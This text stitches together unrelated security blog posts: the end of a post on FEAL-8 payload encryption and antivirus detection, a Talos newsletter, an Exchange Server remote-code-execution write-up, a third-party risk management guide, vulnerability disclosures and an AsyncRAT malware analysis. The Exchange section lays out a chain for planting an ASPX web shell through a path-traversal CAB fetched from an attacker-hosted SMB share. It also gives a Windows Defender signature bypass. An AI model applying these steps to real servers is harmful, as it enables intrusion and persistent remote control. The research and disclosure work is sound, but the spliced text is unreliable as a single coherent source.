So, this example demonstrates how to use the FEAL-8 encryption algorithm to encrypt and decrypt a payload. For checking correctness, I added printing logic.
demo
Let’s see everything in action. Compile it (on my Linux machine):
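The exact command is shown in the screenshot; a typical MinGW-w64 cross-compilation for a sample like this looks something like the following (flags may differ):

    x86_64-w64-mingw32-gcc -O2 hack.c -o hack.exe -s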
As you can see, only 25 of 74 AV engines detect our file as malicious.
cryptanalysis
Historically, FEAL-4, the four-round version of FEAL, was successfully cryptanalyzed using a chosen-plaintext attack before being demolished entirely. Sean Murphy’s later attack was the first published differential-cryptanalysis attack and required only 20 chosen plaintexts. The designers responded with an 8-round FEAL, which Biham and Shamir cryptanalyzed at the SECURICOM '89 conference. Another chosen-plaintext attack against FEAL-8 (H. Gilbert and G. Chassé, “A Statistical Attack on the FEAL-8 Cryptosystem,” Advances in Cryptology: CRYPTO '90 Proceedings, Springer-Verlag, 1991, pp. 22–33), utilizing just 10,000 blocks, caused the creators to give up and define FEAL-N, with a variable number of rounds (of course more than 8).
Biham and Shamir used differential cryptanalysis to break FEAL-N faster than brute force (with 2^64 selected plaintext encryptions) for N < 32. FEAL-16 needed 2^28 chosen plaintexts or 2^46.5 known plaintexts to break. FEAL-8 needed 2000 chosen plaintexts or 2^37.5 known plaintexts to break. FEAL-4 could be cracked with only eight carefully chosen plaintexts.
I hope this post is useful for malware researchers and C/C++ programmers, raises awareness among blue teamers of this interesting encryption technique, and adds a weapon to the red teamers’ arsenal.
This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q3 2024. It was last updated on September 12, 2024. July: We terminated 89 Y…
I have written about the dreaded “cybersecurity skills gap” more times than I can remember in this newsletter, but I feel like it’s time to revisit this topic again.
That’s because the White House announced a new initiative last week for the U.S. government called the “Service for America” initiative designed to train new workers in the cybersecurity field. This measure directs U.S. federal agencies to help recruit and prepare Americans for jobs in cybersecurity and AI by removing certain degree requirements and emphasizing skills-based hiring. This means, hopefully, more educational resources for people looking to break into cybersecurity.
On its face, I’m all in favor of this. I did eventually go back to school to get my associate's degree in cybersecurity, but much of what I’ve learned about this field has been from working at Talos and spending time around my talented and intelligent colleagues, many of whom did not go to college for cybersecurity.
My concern is that, even if we do train these employees and give them the proper skills, it’s on companies to eventually hire them.
A June report from CyberSeek found that there are only enough skilled workers to fill 85 percent of cybersecurity jobs in America. Yet hiring in the industry has remained flat, according to a soon-to-be-released report from cybersecurity non-profit ISC2. This year, the global security workforce is estimated to be 5.5 million, which is only a 0.1 percent increase year over year, according to the report.
Among the more than 15,000 cybersecurity practitioners from around the globe who responded to the study, 38 percent of respondents said their organizations had experienced a cybersecurity hiring freeze over the past year, up 8 percent from 2023. Thirty-seven percent of respondents reported budget cuts to the security program, and another 25 percent said their teams had experienced layoffs.
That same CyberSeek report also found that, in the U.S., the number of cybersecurity-related job postings decreased by 29 percent year over year.
So as these skills-gap-closing programs begin, we need to be thinking about what skills, exactly, managers want their workers to be trained in. There is obviously some sort of disconnect here between the people who want to work in security and the companies or managers who want to hire them. Or perhaps there simply isn’t enough money to go around right now to staff up cybersecurity teams, and that’s just the reality of the current economy in the U.S. and globally.
I’m not saying this to discourage anyone from entering the security space or spread doom and gloom. But I do think it’s important to acknowledge that there are many already skilled and trained workers who simply cannot find work or are treading water throwing dozens of applications at the wall to see what sticks.
I’ve seen too many people posting on LinkedIn recently looking for a cybersecurity job to think that the solution to bolstering security is getting *another* worker in with the same skillset to compete for the same job opening as someone who’s been in the industry for 10 years.
The one big thing
Talos recently uncovered a new threat called “DragonRank” that primarily targets countries in Asia — and a few in Europe — operating PlugX and BadIIS for search engine optimization (SEO) rank manipulation. DragonRank exploits targets’ web application services to deploy a web shell and utilizes it to collect system information and launch malware such as PlugX and BadIIS, running various credential-harvesting utilities. Their PlugX not only uses familiar sideloading techniques, but also leverages the Windows Structured Exception Handling (SEH) mechanism to ensure that the legitimate file can load PlugX without raising suspicion.
Why do I care?
This group compromises Windows Internet Information Services (IIS) servers hosting corporate websites, with the intention of implanting the BadIIS malware. BadIIS is malware used to manipulate search engine crawlers and disrupt the SEO of the affected sites. With those compromised IIS servers, DragonRank can distribute the scam website to unsuspecting users. DragonRank engages in SEO manipulation by altering or exploiting search engine algorithms to improve a website's ranking in search results. They conduct these attacks to drive traffic to malicious sites, increase the visibility of fraudulent content, or disrupt competitors by artificially inflating or deflating rankings. These attacks can harm a company's online presence, lead to financial losses, and damage its reputation by associating the brand with deceptive or harmful practices. The actor then takes these compromised websites and promotes them, effectively turning these sites into platforms for scam operations.
So now what?
Talos released a new Snort rule set and several ClamAV signatures to detect and block the malware used in these attacks. Talos has confirmed that more than 35 IIS servers have been compromised and implanted with the BadIIS malware in this campaign, across a diverse array of geographic regions including Thailand, India, Korea, Belgium, the Netherlands and China, so the campaign is clearly still active and potentially growing.
Top security headlines of the week
A new type of attack called “RAMBO” could allow adversaries to steal data over air-gapped networks with RAM radio signals. An Israeli academic researcher recently announced the discovery of RAMBO (Radiation of Air-gapped Memory Bus for Offense), in which an attacker could generate electromagnetic radiation from a device’s RAM to send data from air-gapped computers. Air-gapped systems are otherwise offline networks that are extremely isolated, often used in critical environments like government agencies, weapons systems and nuclear power stations. While RAMBO cannot be exploited remotely by attackers over the internet, it could open the door for insider threats with access to the network to deploy malware through physical media like USB drives or supply chain attacks. RAMBO could allow attackers to steal encoded files, encryption keys, images, keystrokes and biometric information from these systems at a rate of 1,000 bits per second. Researchers conducted tests into these types of attacks over distances of up to 23 feet. A technical paper published on the topic includes several potential mitigations, including RAM jamming, external EM jamming and Faraday enclosures around potentially targeted systems. (Bleeping Computer, SecurityWeek)
Commercial spyware makers are still finding ways to bypass government sanctions and, in some cases, have made their tools harder to detect. A new report from the Atlantic Council found that “Most available evidence suggests that spyware sales are a present reality and likely to continue.” The report specifically highlights increased activity from Intellexa and the NSO Group, two companies known for creating and selling spyware tools that have been targeted over the past few years by international sanctions. These companies, and specifically Intellexa, have found ways to work around sanctions by restructuring their businesses with subsidiaries, partners and other relationships spread across multiple geographic areas. Intellexa is known for creating the Predator spyware, while the NSO Group is infamous for the Pegasus spyware. Both pieces of software often target high-risk individuals, sometimes by governments, such as journalists, politicians and activists. Security researchers also recently found that Intellexa has established new infrastructure in the Democratic Republic of the Congo and Angola, making “it more difficult for researchers and cybersecurity defenders to track the spread of Predator.” (Dark Reading, The Register)
Several Western intelligence agencies have formally charged the Russian GRU with carrying out cyber attacks against Ukraine designed to disrupt aid efforts. Government agencies in the U.S., U.K. and several other countries blamed Unit 29155, which has been linked to past espionage campaigns, for targeting government and civilian agencies and civil society organizations in Western Europe, the EU and NATO after Russia invaded Ukraine in 2022. Intelligence agencies in the Netherlands, Czech Republic, Germany, Estonia, Latvia, Canada and Australia all signed the declaration. They also formally blamed Unit 29155 for the WhisperGate campaign, a coordinated attack on Ukrainian government agencies in January 2022 that seemed to set the stage for a physical ground invasion. The announcement stated that WhisperGate has since been used to “scout and disrupt” aid deliveries to Ukraine. When Talos first reported on WhisperGate in 2022, our researchers stated that “attackers used stolen credentials in the campaign and they likely had access to the victim network for months before the attack, a typical characteristic of sophisticated advanced persistent threat (APT) operations.” (Reuters, BBC)
Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then they will take a technical deep dive into the latest Linux variant, using the ATT&CK framework to uncover its tactics, techniques and procedures.
Most prevalent malware files from Talos telemetry over the past week
As you may know, I recently presented my Exchange-related talk during OffensiveCon 2024. This series of 4 blog posts is meant to supplement the talk and provide additional technical details. You can read the first post in this series here.
In part 2, I describe the ApprovedApplicationCollection gadget, which was available for abuse because it did not appear on the deny list and could therefore be accessed via MultiValuedProperty. I am also presenting a path traversal in the Windows utility extrac32.exe, which allowed me to complete the chain for a full RCE in Exchange. For the moment, at least, Microsoft has made a decision not to fix this path traversal bug.
In the previous post, I described two RCE vulnerabilities, CVE-2023-21529 and CVE-2023-32031. In this post, I present the next RCE that I found in Microsoft Exchange. It consists of a chain of two vulnerabilities:
• CVE-2023-36756 – a vulnerability in Exchange Server.
• ZDI-CAN-21499 – an unpatched path traversal vulnerability in the Windows utility extrac32.exe.
Microsoft decided that ZDI-CAN-21499 would not be fixed as “Windows customers are not exposed to this vulnerability.” They also note that, in their view, “It is the caller's (the application using extrac32) responsibility to make sure extrac32 is not called on untrusted CAB files.” As we will see in this article, though, the extrac32 issue can be used to an attacker’s advantage.
The Patch for CVE-2023-32031
While Microsoft was dealing with the ProxyNotShell chain back in 2022, I took some time to look for different classes that could be abused to exploit PowerShell Remoting for some security impact, such as RCE, file disclosure, denial of service, or NTLM relaying. I found around 30 unique classes and reported them to Microsoft.
Those submissions were marked as duplicates and were ignored, which in my opinion was a mistake. The initial patch for ProxyNotShell included an allow list, so it seems that the deficiencies in the separate deny list did not attract the attention they should have. The problem became evident later when I discovered the vulnerable MultiValuedProperty class (CVE-2023-21529). This class was present on the allow list, and it allowed me to access a separate, internal deserialization mechanism not subject to the allow-list sanitization. Even after the internal MultiValuedProperty deserialization mechanism was hardened by means of the deny list, I was able to easily abuse the classes that I had reported many months before, as they had not been added to the deny list. For example, I was able to use the Command class, as I described in the previous post. I had originally reported this class to Microsoft in September 2022, but I was able to reuse this class for CVE-2023-32031 almost seven months later because it did not appear on the deny list introduced in the patch for MultiValuedProperty.
To patch CVE-2023-32031, Microsoft expanded the deny list to include all the classes that I had previously reported in 2022. The patch went no further than that. Critically, it still did not introduce an allow list, so it was game on. All I had to do was find another class with security impact not included in the deny list, and then I could use MultiValuedProperty to deserialize it. This became my next challenge.
CVE-2023-36756 – ApprovedApplicationCollection
I was looking for classes where something potentially malicious could be reached either through a single-argument constructor or a static Parse(String) method. This approach led me to the Microsoft.Exchange.Data.Directory.SystemConfiguration.ApprovedApplicationCollection class.
As you can see, we can deliver an object of any type to the constructor. The code flow can go in multiple directions from here.
We are interested in a case where a string is provided to the constructor. When a string is provided, the code expects it to be a valid path to a file with a .cab extension. The code does not validate the path in any meaningful way except for checking the extension. The code leads to the ParseCab method, where the argument contains the attacker-supplied path:
At [1], a FileInfo object is created from the attacker’s path.
At [2] and [3], a temporary output directory is created.
At [4], the OpenCabinetFile method is called.
At [5], the entire temporary directory is deleted.
At this stage, we can note two things. First, we can deliver a UNC path, such as \\192.168.1.100\poc\poc.cab. Second, Exchange PowerShell Remoting requires Kerberos authentication, so the attacker most likely resides in the internal network anyway, and it is rather rare to see SMB traffic filtered internally. Thus, in most cases it will not present a challenge for the attacker to host content that the Exchange server can access over SMB.
Next, our remote path is processed by OpenCabinetFile. Let’s analyze this method.
It seems that our cabinet file is going to be extracted with the following command:
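The exact command line appears in the screenshot from the original post; an extrac32 invocation of this shape generally looks like the following, where the output directory is the temporary directory created above (both paths here are placeholders, with the attacker-controlled UNC path taken from the example earlier):

    extrac32.exe /Y /E /L <temporary-output-directory> \\192.168.1.100\poc\poc.cab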
Basically, the content of our remote CAB file will be extracted to some temporary directory. Then, the entire directory will be deleted. There do not seem to be any unsafe operations available here. As we will see, though, it turns out that extrac32 has its own issues.
ZDI-CAN-21499 – Unpatched Path Traversal in extrac32
In general, we can use the ApprovedApplicationCollection internal Exchange class to extract our CAB file with the Windows utility extrac32.exe. This could lead to a file parsing bug, where the parsing part is performed by some unmanaged code. We could always try to look for memory corruptions in extrac32.exe. Before even thinking about it, I decided to go for a full-dumb option, which can be summarized with the following meme.
I simply created a CAB containing a single file, where the filename contains the path traversal sequence ..\, and tested it.
It turned out that the extrac32 extraction mechanism is vulnerable to a trivial path traversal. There is still one problem, though. The file presented in the screenshot gets detected as malicious by Windows Defender:
Luckily for the attackers, antivirus signatures are not always very smart, and this one can be easily bypassed. For example:
..\poc.txt - the CAB file gets tagged as malicious by Windows Defender.
../poc.txt - the CAB file is seen as legitimate by Windows Defender.
I reported the path traversal vulnerability to Microsoft in June of 2023. After a short discussion, we received the following final response from the vendor:
“To clarify our earlier point – it is the caller's (application using extrac32) responsibility to make sure extrac32 is not called on untrusted CAB files.”
To me, this does not seem sensible. It seems like the equivalent of asking people to manually verify the contents of a ZIP file before you unzip it with one of the available solutions. However, this was Microsoft’s final reply.
The upshot was that since Microsoft clearly stated that it is going to be Exchange’s fault for the way it uses extrac32, I could use this to get a CVE in Exchange.
Chaining the Pieces
The attacker needs to do the following to exploit this vulnerability:
-- Create a malicious CAB file that contains an ASPX web shell, with the file name set to something like ../../../../../../../../inetpub/wwwroot/poc.aspx.
-- Host this CAB file on an SMB share in the domain.
-- Perform PowerShell Remoting deserialization, where:
   -- The target type is MultiValuedProperty<ApprovedApplicationCollection>.
   -- The argument is a UNC path pointing to our CAB file, such as: \\192.168.1.100\poc\poc.cab.
-- Access the webshell and get code execution.
Fragment of the payload:
After this, you can enjoy your web shell.
As always, I have prepared a demo that presents the entire exploitation process.
Summary
In this blog post, I have presented the CVE-2023-36756 vulnerability in Microsoft Exchange Server. It allowed any authenticated attacker to achieve remote code execution by uploading a web shell.
In my next blog post, part 3 of the Exchange PowerShell Remoting series, I am going to present my CVE-2023-36745 RCE vulnerability. To make it work, I had to prepare one of the craziest chains that I have ever made, so I am excited to share it with you. Once again, you can watch my entire OffensiveCon 2024 talk here.
Performance is a critical factor in the usability and efficiency of any software, and Burp Suite is no exception. We've recently focused on enhancing Burp Suite's performance across several key areas
Hands-on security testers need the best tools for the job. Tools you have faith in, and enjoy using all day long. Burp Suite has long been that tool, and now, it's faster than ever. We’ve listened to
In today’s world, organizations are increasingly depending on their third-party vendors, suppliers, and partners to support their operations.
This way of working, in addition to the digitalization era we’re in, can have great advantages, such as being able to offer new services quickly while relying on others’ expertise or cutting costs on already existing processes. However, by opening their (digital) doors to third-parties or by sending them their precious data, organizations are exposing themselves to a broader range of risks. From data breaches caused by third-parties and unauthorized accesses through third-parties to regulatory compliance failures, the organization’s risk exposure should also factor in third-party security risks.
Third-Party Risk Management (TPRM) revolves around the ability for organizations to identify, and remain in control of, the risks that emanate from working with their third-parties. In fact, relying on third-parties comes with a shared responsibility between you and your third-party, for which you ultimately bear the end responsibility.
In this very first blogpost, within a series dedicated to TPRM, we’ll introduce TPRM and its key components. In the next blogposts, we will tackle specific topics and address questions you might have on TPRM.
So, what is Third-Party Risk Management?
TPRM is the process of identifying, minimizing, and keeping control of the risks that come from working with third-parties or service providers. In very simple terms, we’re assessing the maturity of third-parties (e.g. suppliers), in terms of cybersecurity, before signing the contract with them. By “third-parties” & “service providers” we mean any organization which either:
Manages any of your sensitive information (e.g. has access to, collects, processes, stores or archives it). For example: cloud providers (IaaS, PaaS, SaaS), business service providers, etc.
Is connected to, or has access to, your internal network or systems. For example: IT services providers, etc.
Can impact the reputation of your organization in any other way based on the context of the relationship. For example: a business partner whose services you recommend to your own customers, or a business partner which hosts an internet-facing website branded with your organization’s logo.
By building strong TPRM foundations, organizations can minimize risks before they even materialize, by identifying them before any contract is signed and by asking the third-party to remediate some of the findings. Through TPRM, an organization can ensure, to some extent, the alignment of their own security requirements across the entire supply chain (whether internal or outsourced). Organizations with a mature TPRM process will also monitor the activities of their third-parties, and regularly reassess the risks.
Why should we give TPRM the right level of importance?
Our introduction so far already provides you with ideas on the importance of Third-Party Risk Management. As we said, organizations become more and more digitally interconnected and reliant on their third-parties. Let us stress here the key reasons why TPRM matters in your security program:
Ensuring Operational Resilience: Whether a third-party has access to your internal systems in order to assist with your organization’s operation, or whether part of your operations is entirely outsourced to a third-party; an incident emanating from third-parties can heavily disrupt your activities and your ability to deliver services.
Protecting Sensitive Data: As the exchange of sensitive customer data & intellectual property between organizations increases, so does the risk of data disclosure.
Managing Reputational Risk: Data disclosures & operational continuity issues, even caused by the mistakes of a third-party, can impact the reputation of an organization; leading to loss of business opportunities & customers.
Meeting Regulatory Compliance: Many industries are subject to strict regulations and compliance requirements such as the well-known GDPR, the feared NIS2 or DORA. Engaging with non-compliant third-parties can expose organizations to compliance violations, fines, and reputational damage. Furthermore, for some industries performing Third-Party Risk Management can be a regulatory requirement on its own.
Strengthening Competitive Advantage: As customers’ and partners’ expectations around security become more and more of a priority, organizations which can demonstrate a mature approach to information security, including third-party risk management, can gain the trust of their customers and stakeholders, giving them a competitive advantage.
A mature and well maintained TPRM program will make it easy to demonstrate to higher management that this is all under control.
According to ENISA’s Threat Landscape (2023), supply chain attacks and third-party security breaches are among the top threats to be considered. Does your organization consider them?
How to build your TPRM framework?
Based on our experience, we propose a couple of building blocks to structure your TPRM activities.
1. Obtain visibility on all your third-parties.
To start your TPRM efforts, you first need to have an eye on all the third-parties your organization is involved with. A central inventory of your third-parties is a must.
If your organization has a procurement team, they’ll typically already have such an inventory. We recommend linking your efforts with the procurement team rather than recreating such an inventory on your side, as keeping two inventories aligned adds unnecessary complexity. With procurement being the gatekeeper of contracts, joining forces will also help your TPRM efforts in identifying new third-parties or third-parties for which the relationship has ended.
If your organization does not yet have a procurement team, or such an inventory, clear communication and processes with the business side will be crucial so that they share with you the list of third-parties they are aware of.
2. Start from your risk management program and risk appetite to steer your efforts.
Next, you should determine your security risk appetite and use this to steer your third-party risk management efforts. Don’t be mistaken: just as with every security discipline, you will waste resources if you don’t set your focus right. Applying the concept of tiering based on inherent risk¹ is crucial in this aspect (refer to 3. below).
3. Execute with operational excellence.
TPRM is often perceived, by the business wanting to contract with the third-party, as a time consuming constraint. It is of utmost importance that your TPRM program is well integrated with other existing functions within your organization, such as procurement, data protection office, IT, etc.
In our opinion, running a third-party risk management program should focus on three key activities:
Assessment execution, for risk identification and analysis:
Identifying the third-parties that should be assessed based on their criticality for you (for example through tiering based on inherent risk for your organization).
Assessing the third-parties, with different assessment types depending on this risk tiering: either by sending them a security questionnaire, by conducting interviews and/or by analyzing their existing information security certifications. More companies are also providing assurance through trust portals such as SafeBase (the SafeBase Trust Center enables security teams to proactively share and automate access to security, compliance, and privacy information and to complete security questionnaires). These assessments could be complemented with technical audits, such as pentests or vulnerability scans.
Consider the contractual agreements that should be set up with the third-party, such as information security, data privacy or business continuity requirements. The contract could be updated to ensure the third-party’s commitment to fix the findings you have identified.
Plan for the end before it even begins. What do you expect the third-party to do once the relationship ends? Return your data to you and then delete it of course!
Set up clear agreements for third-parties on the reporting of security incidents which might affect you, so that you can easily ingest this in your standard incident response activities.
Debriefing of results & next steps:
Notifying relevant stakeholders (such as the business that will be responsible for the service) of the risk and findings (if any) that resulted from the assessment, and explaining the risk(s) of working with the third-party.
Help the stakeholders in defining an action plan to further reduce the risk (e.g. risk treatment), which they can then also coordinate with the third-party.
Monitoring of agreed actions and changes:
The first aspect of monitoring, which a lot of companies are not yet succeeding at, is monitoring risk treatment: verifying that the third-party has effectively remediated the risks.
Your organization should also monitor the evolution of the relationship/service with the third-party. While at the beginning a service can seem ‘low risk’, new bits & pieces, such as a brand-new feature on a platform, can be added along the months or years. The once ‘low risk’ service can rapidly evolve into a ‘high risk’ service which might require you to reassess the third-party based on the updated criteria.
As we typically see companies focusing more and more on cybersecurity, it would be natural to expect companies to improve their stance in that regard. However, it is not impossible for a company’s maturity (regarding cybersecurity) to go down. So even if the service has not evolved, you should always consider reassessing your third-parties regularly.
Finally, your organization will want to define indicators to be able to monitor both:
The progress of the Third-Party security activities regarding the Third-Party portfolio and process execution (KPIs); and
The risk posture and exposure of the organization regarding its Third-Parties (KRIs).
Measuring will allow you to identify areas for improving operational excellence and achieving better risk coverage.
As a lot of companies still organize their TPRM efforts mostly manually, it can be interesting to explore automation capabilities to achieve further operational excellence. For ideas on this we refer to an earlier blogpost.
Conclusion
As organizations become more and more interconnected with their third-parties and rely on them to support their operations, the need for effective Third-Party Risk Management becomes unavoidable. By focusing on TPRM, organizations can minimize the risks of engaging with their third-parties and remain in control of these risks. TPRM will not only proactively protect organizations’ sensitive data, operational continuity, and reputation, but will also strengthen trust with the organization’s stakeholders & customers by demonstrating your control over your supply chain.
Thanks for reading our blogpost. Feel free to reach out to NVISO, and in particular the dedicated Enterprise GRC team, to dig further into this subject, share your feedback or discuss how we can build something together.
¹ Inherent risk is the natural risk level in a process that has not been controlled or mitigated in risk management.
About the authors
David & Noé both joined NVISO about 5 years ago. Since then, they have worked on different TPRM projects at some of Belgium’s biggest financial institutions, including 3 years together in the same TPRM project.
Update: Turns out @sixtyvividtails has already discovered the very same issue via a minimalist PE file back in June. Touché! Old post: This is a silly example of a basic mistake leading to a funny discovery… When I was experimenting …
Cisco Talos’ Vulnerability Research team has discovered two vulnerabilities that were disclosed and fixed over the past few weeks.
Talos discovered a time-of-check time-of-use vulnerability in Adobe Acrobat Reader, one of the most popular PDF readers currently available, and an information disclosure vulnerability in the Microsoft Windows AllJoyn API.
For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.
Microsoft AllJoyn API information disclosure vulnerability
The AllJoyn API in some versions of the Microsoft Windows operating system contains an information disclosure vulnerability.
TALOS-2024-1980 (CVE-2024-38257) could allow an adversary to view uninitialized memory on the targeted machine.
AllJoyn is a DCOM-like framework for creating method calls or sending one-way signals between applications on a distributed bus. It primarily is used in internet-of-things (IoT) devices to tell the devices to perform certain tasks, like turning lights on or off or reading the temperature of a space.
Microsoft fixed this issue as part of its monthly security update on Tuesday. For more on Patch Tuesday, read Talos’ blog here.
CVE-2024-38257 is considered “less likely” to be exploited, though it does not require any user interaction or user privileges.
Adobe Acrobat Reader, one of the most popular pieces of PDF reading software currently available, contains a time-of-check, use-after-free vulnerability that could trigger memory corruption, and eventually, arbitrary code execution.
TALOS-2024-2011 (CVE-2024-39420) can be triggered if an adversary tricks a targeted user into opening a specially crafted PDF file with malicious JavaScript embedded. This JavaScript could then trigger memory corruption due to a race condition.
Depending on the memory layout of the process this vulnerability affects, it may be possible to abuse this vulnerability for arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.
In cybersecurity, threats constantly evolve, and new ways to exploit unsuspecting users are being found. One of the latest menaces is a recent AsyncRAT variant, a sophisticated remote access trojan (RAT) that’s been making waves by marketing itself as cracked software. This tactic plays on the desire for free access to premium software, luring users into downloading what appears to be a harmless application. However, beneath the surface lies dangerous malware designed to infiltrate systems, steal sensitive information, and give cybercriminals complete control over infected devices.
In this blog, we’ll examine the mechanics of AsyncRAT, how it spreads by masquerading as cracked software, and the steps you can take to protect yourself from this increasingly common cyber threat.
McAfee telemetry data shows this threat has been in the wild since March 2024 and is prevalent with infected hosts worldwide.
We have observed many initial vectors for this chain, masquerading as different software.
The sample analyzed here comes themed as the AnyDesk software. HASH: 2f1703c890439d5d6850ea1727b94d15346e53520048b694f510ed179c881f72
In this blog, we will analyze the AnyDesk-themed malware; the other noted themes are similar in nature.
Also, note that the setup.dll file shown in the above pictures is the same file in each case, as it has the same hash.
Anydesk 8.0.6 Portable.exe is a 64-bit .NET file. However, it is not the original Anydesk file; it is malware.
Carried within the malware is an Anydesk.data file, the genuine anydesk application.
We can confirm that the Anydesk.data file has a valid digital signature from the publishers of the AnyDesk software.
When we rename the anydesk.data file to anydesk.exe, we can also see the anydesk software running.
Setup.dll is a bat file, as we can see in the above image
We start debugging by putting the malicious AnyDesk executable into the Dnspy tool to review the source code.
The primary function calls the IsAdmin function, which checks the current context of the running process. Based on this, it calls four functions in succession: AddExclusion, CopyAndRenameFile, RunScript, and ExecuteScript. We will check each function call separately.
The AddExclusion function passes the above string into the RunHiddenCommand function.
RunHiddenCommand will take that string, launch an instance of PowerShell, and execute that string as an argument.
This will effectively add a Windows Defender scan exclusion for the entire C drive.
The CopyAndRenameFile function will rename the setup.dll file to setup.bat and copy it to the appdata\local\temp folder.
After the bat file is copied to the temp folder, it will be executed using a process start call.
Now, to convince the user that he has indeed opened the AnyDesk software, the AnyDesk.data file containing the original AnyDesk software will be renamed AnyDesk.exe.
This is the whole purpose of the malicious AnyDesk.exe file. Now the attack chain moves on to executing the bat script, which we will analyze further.
The bat file uses DOS obfuscation.
It is setting environment variables to be used later during execution.
Also, lines 6 and 7 have two long comments and an encrypted payload.
In line 13, it echoes something and pipes it to the %Ahmpty% environment variable.
We can easily deobfuscate the strings by launching an instance of cmd, executing the set commands, and echoing the contents of the variables.
One thing to note here is that %variablename% will echo the entire contents of the variable, but %variablename:string=% will replace any occurrence of “string” in the contents of the variable with nothing, effectively deleting it.
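As a quick illustration of this cmd behavior (a generic example, not the exact variables from the sample):

    C:\> set Ahmpty=po###wer###shell
    C:\> echo %Ahmpty%
    po###wer###shell
    C:\> echo %Ahmpty:###=%
    powershell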
The above image is after deobfuscation of all strings and formatting of the script in a human-readable form.
The script first sets @echo off.
Then, it checks if the environment variable Ajlp is set. If not, it sets Ajlp to 1 and again starts the execution of the bat script (%0 contains the path to the same script) in minimized form, exiting the original script.
Then we have our two comments, which later turn out to be encrypted payloads.
Then the script checks which version of PowerShell is present on the system because, for older versions of Windows, PowerShell is sometimes located in the syswow64 folder. This check is done to ensure successful execution on those versions of Windows.
Then, a long script is echoed at the end and piped for execution to PowerShell.
One interesting thing to note is that %~0 is echoed as part of the script and passed to PowerShell for execution. This trick passes the path of the bat script to the PowerShell script for further processing.
Note the difference between the contents of the %0 and %~0 variables: they differ only in the surrounding double quotes, which %~0 strips.
Moving on to the PowerShell script, we can see it sets the PowerShell window title to the path of the bat script using the $host.UI.RawUI.WindowTitle property.
As we saw before, this path of the bat script was passed to it when %~0 was echoed as part of the script.
Then we have some string replacement operations.
We can see the contents of the variable after the string replacement operation is done. It is being used to hide strings with malicious intent, such as invoke, load, frombase64string, etc.
Then we have a command to hide the PowerShell window.
Then we have two functions: the first one is used for AES decryption, and the second one is used for Gzip decompression.
Then, we have some operations that we will investigate in detail next.
Then we have two calls to System.Reflection.Assembly, which reflectively load the assemblies into memory.
This is the deobfuscated and high-level view of the script for easy readability.
We can see that the $lmyiu variable contains the contents of the entire bat file. It reads them using the System.IO.File call, which takes as a parameter the path supplied through [console]::Title. We know the title was set to the path of the original bat script at the beginning.
Now, indexes 5 and 6 are being read from the bat file, which (with indexing starting from 0) translates to lines 6 and 7, the ones containing the comments.
Now, the first two characters are removed using Substring to strip the two colons (::), which mark a comment in the bat file.
In the above image, we can see the output of that line, which contains the comment.
Now, the comment is converted from a base64 string and passed to a function that does AES decryption. The result is passed into a function that does Gzip decompression and is stored in the assembly1 variable. The same thing happens for the second comment to get the second assembly.
Once both assemblies are decrypted, they are reflectively loaded into memory using the System.reflection.assembly call.
We can dump the two decrypted assemblies onto the disk for further analysis, as shown in the above image.
After writing to disk, we load both assemblies in CFF Explorer.
Assembly1 in CFFExplorer.
Assembly2 in CFFExplorer.
We load both assemblies into Dnspy for further debugging.
We can see that both assemblies are heavily obfuscated using Confuser Packer, and their contents are not easily readable for analysis.
This is intended to slow down the debugging process.
We will use the .NET reactor slayer to deobfuscate the two assemblies. This will remove the confusing obfuscation and give us readable assemblies.
We use it for both assemblies and write the deobfuscated versions to disk.
When we load the assemblies into Dnspy, we see they have cleaned up nicely, and confuser obfuscation is entirely removed.
We can see first it checks the console title of the current process.
We can also see a few anti-debugging API calls, IsDebuggerPresent and CheckRemoteDebuggerPresent. If any of these calls return true, the program exits.
After that, there is a call to smethod_3.
Inspecting the smethod_3 function, we see some encrypted strings, all of which are being passed as arguments to the smethod_0 function.
By checking the smethod_0 function, we get the StringBuilder function, which will be used to convert the encoded strings into readable form.
We put a breakpoint on the return call to see the decoded string being populated in the local window in case it is related to a scheduled task.
Checking further, we get the call where the assembly is being written to disk in the appdata\Roaming folder with the name Network67895Man.cmd using the File.WriteAllBytes call. We can inspect the arguments in the local window.
In the above image, we see that the Network67895Man.cmd file is being executed using the Process.Start call.
We can confirm that the hash of Network67895Man.cmd and our assembly are the same. We can also visually confirm that the file is in the appdata\roaming folder.
Now that we see the persistence mechanism, we can see the return value of our string builder function related to the scheduled task.
We copy the complete string and inspect it in Notepad++. We see that the PowerShell command is used to schedule a task named ‘OneNote 67895’. This will trigger At Logon, and the action is the execution of the Network67895Man.cmd file with some more parameters.
We can confirm the task being scheduled in the Task Scheduler window.
Moving on, see how the next stage is decrypted and loaded into memory
One thing to observe here is that this assembly contains a resource named P, which turns out to contain the encrypted next-stage payload.
Dumping the resource onto disk and checking its content, we see the encrypted payload bytes starting from 1F 8B 08 00…
In the local window, we can see the string P is being passed to the smethod_3 function, which will read the resource stream and the bytes of the P resource.
We can confirm that the bytes have been read from the resource and can be seen in the local window in the result variable. We can see the same bytes, i.e., 1F 8B 08 00.
Now, we put a breakpoint on the load call and inspect the contents of the raw assembly variable to see the decrypted payload.
We dump it to disk for further inspection.
Checking it in CFF Explorer, we see this is also a 32-bit .NET assembly file with the internal name stub.exe.
Loading it into dnSpy, we can see an obfuscated AsyncRAT client payload named AsyncClient.
We can see all the functions in clear text, like Anti-analysis, Lime logger, mutex control, etc.
This is the final AsyncRAT client payload, obtained after many layers of the attack chain. We will now look at some interesting features of the AsyncRAT payload.
We can see it has its own persistence mechanism, which checks whether the process is running as admin. If true, it creates a scheduled task by launching cmd.exe; otherwise, it creates a Run key in the Windows registry for persistence.
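To illustrate where the non-admin variant of this persistence would show up, the sketch below enumerates the current user's Run key with Python's winreg module (Windows-only). The registry path is the standard Run key; the value name the sample uses is whatever was observed during analysis and is not assumed here.

import winreg

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

def list_run_entries():
    # Enumerate HKCU Run-key values, where this kind of persistence would appear.
    entries = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        index = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, index)
            except OSError:
                break
            entries.append((name, value))
            index += 1
    return entries

for name, value in list_run_entries():
    print(f"{name}: {value}")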
We can see the encrypted config of the AsyncRAT client, including the port used, host, version, key, etc.
